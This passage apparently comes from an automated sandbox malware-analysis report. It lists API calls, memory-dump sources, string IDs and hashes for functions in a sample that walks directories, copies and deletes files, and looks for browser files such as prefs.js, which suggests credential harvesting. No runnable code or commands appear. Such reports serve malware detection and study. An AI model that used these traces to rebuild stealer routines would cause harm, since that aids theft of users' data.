                                              • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                              • Instruction ID: a430c108bdd9e758f4942b1e389fe29bfcb3f92b5b3605e4bf0fc4afcbb15e32
                                              • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                              • Instruction Fuzzy Hash: 7AA134B5A40218ABDB34DFA4DD88FEE7379FF49300F444589A60D96240EB75AB84CF52
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                              • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                              • wsprintfA.USER32 ref: 004145A6
                                              • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                              • FindClose.KERNEL32(000000FF), ref: 004146A0
                                              • lstrcatA.KERNEL32(?,02BEB060,?,00000104), ref: 004146C5
                                              • lstrcatA.KERNEL32(?,02BE9D28), ref: 004146D8
                                              • lstrlenA.KERNEL32(?), ref: 004146E5
                                              • lstrlenA.KERNEL32(?), ref: 004146F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                              • String ID: %s\%s$%s\*
                                              • API String ID: 13328894-2848263008
                                              • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                              • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                              • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                              • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                              APIs
                                              • wsprintfA.USER32 ref: 047F4B93
                                              • FindFirstFileA.KERNEL32(?,?), ref: 047F4BAA
                                              • StrCmpCA.SHLWAPI(?,00420FDC), ref: 047F4BD8
                                              • StrCmpCA.SHLWAPI(?,00420FE0), ref: 047F4BEE
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047F4DE4
                                              • FindClose.KERNEL32(000000FF), ref: 047F4DF9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                              • Instruction ID: 34137e100bca3da742039de37e7523c03c97de8e37f87b031111c8be88c3ae02
                                              • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                              • Instruction Fuzzy Hash: A56188B5950218BBDB24EFE0DD48FEA73BDFB59700F40468CA60992240EB75A785CF91
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 047EC15C
                                              • StrCmpCA.SHLWAPI(?,004213F8), ref: 047EC1B4
                                              • StrCmpCA.SHLWAPI(?,004213FC), ref: 047EC1CA
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047ECA26
                                              • FindClose.KERNEL32(000000FF), ref: 047ECA38
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                              • Instruction ID: 512b61d225deceaad11fcc2017381e6ca4728390a4a30922519689ef15509469
                                              • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                              • Instruction Fuzzy Hash: 57421476910204ABEB24FBB0DD59EFD7379AF98304F404569A60E96390EE34BB4CCB51
                                              APIs
                                              • wsprintfA.USER32 ref: 00413EC3
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                              • FindClose.KERNEL32(000000FF), ref: 00414081
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\%s
                                              • API String ID: 180737720-4073750446
                                              • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                              • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                              • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                              • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 047F47E7
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F47EE
                                              • wsprintfA.USER32 ref: 047F480D
                                              • FindFirstFileA.KERNEL32(?,?), ref: 047F4824
                                              • StrCmpCA.SHLWAPI(?,00420FC4), ref: 047F4852
                                              • StrCmpCA.SHLWAPI(?,00420FC8), ref: 047F4868
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047F48F2
                                              • FindClose.KERNEL32(000000FF), ref: 047F4907
                                              • lstrcat.KERNEL32(?,0064A524), ref: 047F492C
                                              • lstrcat.KERNEL32(?,0064A22C), ref: 047F493F
                                              • lstrlen.KERNEL32(?), ref: 047F494C
                                              • lstrlen.KERNEL32(?), ref: 047F495D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                              • String ID:
                                              • API String ID: 671575355-0
                                              • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                              • Instruction ID: bea187e9565bbf522058c066f2269e580c67d744de44110ca24bd99bc059601d
                                              • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                              • Instruction Fuzzy Hash: 4C5188B9550218AFD724EFB0DC89FEE737DEB58700F404588E64992290DB74A784CF92
                                              APIs
                                              • wsprintfA.USER32 ref: 047F412A
                                              • FindFirstFileA.KERNEL32(?,?), ref: 047F4141
                                              • StrCmpCA.SHLWAPI(?,00420FAC), ref: 047F416F
                                              • StrCmpCA.SHLWAPI(?,00420FB0), ref: 047F4185
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047F42D3
                                              • FindClose.KERNEL32(000000FF), ref: 047F42E8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                              • Instruction ID: 06c4c05b06fff6f97ce72d5f8d49c275720ee0fa1f941d1684928ffec8b34b11
                                              • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                              • Instruction Fuzzy Hash: 365184B6900218BBDB24FBF0DD89EEA737DBB58304F404588A74992240EB75A785CF55
                                              APIs
                                              • wsprintfA.USER32 ref: 0040ED3E
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                              • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                              • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                              • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID: %s\*.*
                                              • API String ID: 180737720-1013718255
                                              • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                              • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                              • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                              • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                              • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                              • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                              • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                              • String ID: 4@$\*.*
                                              • API String ID: 2325840235-1993203227
                                              • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                              • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                              • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                              • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                              • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                              • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID: prefs.js
                                              • API String ID: 3334442632-3783873740
                                              • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                              • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                              • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                              • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042510C,?,00401F2C,?,004251B4,?,?,00000000,?,00000000), ref: 00401923
                                              • StrCmpCA.SHLWAPI(?,0042525C), ref: 00401973
                                              • StrCmpCA.SHLWAPI(?,00425304), ref: 00401989
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                              • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                              • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                              • String ID: \*.*
                                              • API String ID: 1415058207-1173974218
                                              • Opcode ID: 2a5dfd0982ffaa28f4a1145b9885ee67d6835f0334a6e678b2dff54725d62d78
                                              • Instruction ID: 39d00e11cde3818330ac08f623c81c852c64dcafcc1d6f8b5eceb62ce14d4984
                                              • Opcode Fuzzy Hash: 2a5dfd0982ffaa28f4a1145b9885ee67d6835f0334a6e678b2dff54725d62d78
                                              • Instruction Fuzzy Hash: F51260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                              APIs
                                              • wsprintfA.USER32 ref: 047EEFA5
                                              • FindFirstFileA.KERNEL32(?,?), ref: 047EEFBC
                                              • StrCmpCA.SHLWAPI(?,00421538), ref: 047EF012
                                              • StrCmpCA.SHLWAPI(?,0042153C), ref: 047EF028
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047EF515
                                              • FindClose.KERNEL32(000000FF), ref: 047EF52A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNextwsprintf
                                              • String ID:
                                              • API String ID: 180737720-0
                                              • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                              • Instruction ID: 98fc015850d3504943cd9925644325acb502248f695e9b2b5e266f7e59edb087
                                              • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                              • Instruction Fuzzy Hash: 74E1CE72911218AAEB68FB60DD55EEE7339AF54204F4041E9B60E62391EF307F89CF51
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                              • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                              • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                              • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                              • Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
                                              • Opcode Fuzzy Hash: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
                                              • Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 047EDD52
                                              • StrCmpCA.SHLWAPI(?,004214B4), ref: 047EDD9A
                                              • StrCmpCA.SHLWAPI(?,004214B8), ref: 047EDDB0
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047EE033
                                              • FindClose.KERNEL32(000000FF), ref: 047EE045
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                              • Instruction ID: 5265d2143425c132ce8da19d153fdeea32a7966027891272b26f51ed5cc84c44
                                              • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                              • Instruction Fuzzy Hash: 7F915272A002049BDB24FBB0DD59DFD737DAF99304F408668A54A96340EE34BB5C8B91
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 047EF985
                                              • StrCmpCA.SHLWAPI(?,004215BC), ref: 047EF9D6
                                              • StrCmpCA.SHLWAPI(?,004215C0), ref: 047EF9EC
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 047EFD18
                                              • FindClose.KERNEL32(000000FF), ref: 047EFD2A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                              • String ID:
                                              • API String ID: 3334442632-0
                                              • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                              • Instruction ID: 7106147f75ef069eb8950fa9790813f3865873a4ff4a1b60bae460ea4d26b3e9
                                              • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                              • Instruction Fuzzy Hash: A1B13F71A10218ABDB24EF60DDA9EEE7379AF54304F4082A9D54E96350EF307B49CF91
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                              • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                              • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
